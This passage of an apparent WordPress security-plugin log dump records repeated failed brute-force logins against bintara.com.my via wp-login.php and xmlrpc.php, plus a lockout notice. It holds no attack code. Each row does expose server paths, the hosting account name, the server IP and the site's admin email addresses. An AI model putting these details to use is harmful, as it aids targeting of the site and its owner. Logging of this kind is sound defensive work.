empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"185.166.131.146\";s:11:\"REMOTE_PORT\";s:5:\"38182\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYF9mG4SfF9g@8lNlxwmsgAAAEY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568767384.5998\";s:12:\"REQUEST_TIME\";s:10:\"1568767384\";}}','notice','2019-09-18 00:43:06','2019-09-18 00:43:05',17739880,19230240,'https://bintara.com.my/wp-login.php',1,0,'185.166.131.146'),(24813,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"164.39.7.99\";s:11:\"REMOTE_PORT\";s:5:\"36056\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYF8DSqbKGlf1IVly7ODEgAAAUw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568766989.9575\";s:12:\"REQUEST_TIME\";s:10:\"1568766989\";}}','notice','2019-09-18 00:36:31','2019-09-18 00:36:30',18255976,19553832,'https://bintara.com.my/xmlrpc.php',1,0,'164.39.7.99'),(24812,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"164.39.7.99\";s:11:\"REMOTE_PORT\";s:5:\"34882\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYF8Cm4SfF9g@8lNlxwmkAAAAE8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568766986.6669\";s:12:\"REQUEST_TIME\";s:10:\"1568766986\";}}','notice','2019-09-18 00:36:28','2019-09-18 00:36:27',17742440,19233224,'https://bintara.com.my/wp-login.php',1,0,'164.39.7.99'),(24811,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.75.56\";s:11:\"REMOTE_PORT\";s:5:\"57934\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYF7mY75s89pqgR69SLvXQAAAZM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568766873.9312\";s:12:\"REQUEST_TIME\";s:10:\"1568766873\";}}','notice','2019-09-18 00:34:35','2019-09-18 00:34:34',18253024,19549944,'https://bintara.com.my/xmlrpc.php',1,0,'37.187.75.56'),(24807,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"216.10.243.118\";s:11:\"REMOTE_PORT\";s:5:\"55008\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYF4tyqbKGlf1IVly7OCSQAAAUs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568766135.8506\";s:12:\"REQUEST_TIME\";s:10:\"1568766135\";}}','notice','2019-09-18 00:22:19','2019-09-18 00:22:16',18257704,19555624,'https://bintara.com.my/xmlrpc.php',1,0,'216.10.243.118'),(24808,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.81.84.140\";s:11:\"REMOTE_PORT\";s:5:\"58024\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYF6qI75s89pqgR69SLu0QAAAZg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568766632.5684\";s:12:\"REQUEST_TIME\";s:10:\"1568766632\";}}','notice','2019-09-18 00:30:36','2019-09-18 00:30:33',17741952,19232464,'https://bintara.com.my/wp-login.php',1,0,'103.81.84.140'),(24809,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.81.84.140\";s:11:\"REMOTE_PORT\";s:5:\"33468\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYF6sI75s89pqgR69SLu0wAAAYM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568766640.7411\";s:12:\"REQUEST_TIME\";s:10:\"1568766640\";}}','notice','2019-09-18 00:30:42','2019-09-18 00:30:41',18255472,19550664,'https://bintara.com.my/xmlrpc.php',1,0,'103.81.84.140'),(24810,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.75.56\";s:11:\"REMOTE_PORT\";s:5:\"57608\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYF7lo75s89pqgR69SLvXAAAAYk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568766870.746\";s:12:\"REQUEST_TIME\";s:10:\"1568766870\";}}','notice','2019-09-18 00:34:32','2019-09-18 00:34:31',17742912,19233520,'https://bintara.com.my/wp-login.php',1,0,'37.187.75.56'),(25428,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:01:11\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:01:11\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:16:11\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:16:11\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:01:12','2019-09-21 11:01:11',17883968,19290512,'https://bintara.com.my/2019/wp-login.php',1,0,'37.247.54.2'),(25429,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:01:12','2019-09-21 11:01:11',18089544,19290512,'https://bintara.com.my/2019/wp-login.php',1,0,'37.247.54.2'),(25430,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYC@7fBTP0kPOVnb8jpjgAAAFQ\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"212.224.118.117\";s:11:\"REMOTE_PORT\";s:5:\"46690\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53: